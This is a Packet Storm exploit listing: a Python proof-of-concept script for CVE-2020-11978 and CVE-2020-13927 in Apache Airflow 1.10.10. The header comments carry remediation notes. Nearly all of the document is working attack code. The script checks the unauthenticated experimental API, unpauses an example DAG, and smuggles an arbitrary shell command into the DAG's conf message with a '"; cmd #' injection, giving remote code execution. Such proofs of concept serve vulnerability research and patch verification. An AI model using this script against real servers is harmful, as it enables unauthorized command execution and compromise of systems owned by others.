Lucene search

K
packetstormPepe BerbaPACKETSTORM:162908
HistoryJun 02, 2021 - 12:00 a.m.

Apache Airflow 1.10.10 Remote Code Execution

2021-06-0200:00:00
Pepe Berba
packetstormsecurity.com
290
`# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution   
# Date: 2021-06-02  
# Exploit Author: Pepe Berba  
# Vendor Homepage: https://airflow.apache.org/  
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html  
# Version: <= 1.10.10  
# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)  
# CVE : CVE-2020-11978  
#   
# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow  
# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.  
# Together, potentially allows unauthenticated RCE to Airflow   
#   
# Repo: https://github.com/pberba/CVE-2020-11978  
# More information can be found here:   
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E  
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E  
#  
# Remediation:  
# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.  
# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.  
#  
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"  
  
import argparse  
import requests  
import sys  
import time  
  
def create_dag(url, cmd):  
print('[+] Checking if Airflow Experimental REST API is accessible...')  
check = requests.get('{}/api/experimental/test'.format(url))  
  
if check.status_code == 200:  
print('[+] /api/experimental/test returned 200' )  
else:  
print('[!] /api/experimental/test returned {}'.format(check.status_code))  
print('[!] Airflow Experimental REST API not be accessible')  
sys.exit(1)  
  
check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))  
if check_task.status_code != 200:  
print('[!] Failed to find the example_trigger_target_dag.bash_task')  
print('[!] Host isn\'t vunerable to CVE-2020-11978')  
sys.exit(1)  
elif 'dag_run' in check_task.json()['env']:  
print('[!] example_trigger_target_dag.bash_task is patched')  
print('[!] Host isn\'t vunerable to CVE-2020-11978')  
sys.exit(1)  
print('[+] example_trigger_target_dag.bash_task is vulnerable')  
  
unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))  
if unpause.status_code != 200:  
print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')  
sys.exit(1)  
else:  
print('[+] example_trigger_target_dag was enabled')  
  
print('[+] Creating new DAG...')  
res = requests.post(  
'{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),  
json={  
'conf': {  
'message': '"; {} #'.format(cmd)  
}  
}  
)  
  
if res.status_code == 200:  
print('[+] Successfully created DAG')  
print('[+] "{}"'.format(res.json()['message']))  
else:  
print('[!] Failed to create DAG')  
sys.exit(1)  
  
wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(  
url = url,  
execution_date=res.json()['execution_date']  
)  
  
start_time = time.time()  
print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')  
print('[.] If the bash task is never queued, then the scheduler might not be running.')  
while True:  
time.sleep(10)  
res = requests.get(wait_url)  
status = res.json()['state']  
if status == 'queued':  
print('[.] Bash task queued...')  
elif status == 'running':  
print('[+] Bash task running...')  
elif status == 'success':  
print('[+] Bash task successfully ran')  
break  
elif status == 'None':  
print('[-] Bash task is not yet queued...'.format(status))  
else:  
print('[!] Bash task was {}'.format(status))  
sys.exit(1)  
  
return 0  
  
  
def main():  
arg_parser = argparse.ArgumentParser()  
arg_parser.add_argument('url', type=str, help="Base URL for Airflow")  
arg_parser.add_argument('command', type=str)  
args = arg_parser.parse_args()  
  
create_dag(  
args.url,   
args.command  
)  
  
if __name__ == '__main__':  
main()  
  
`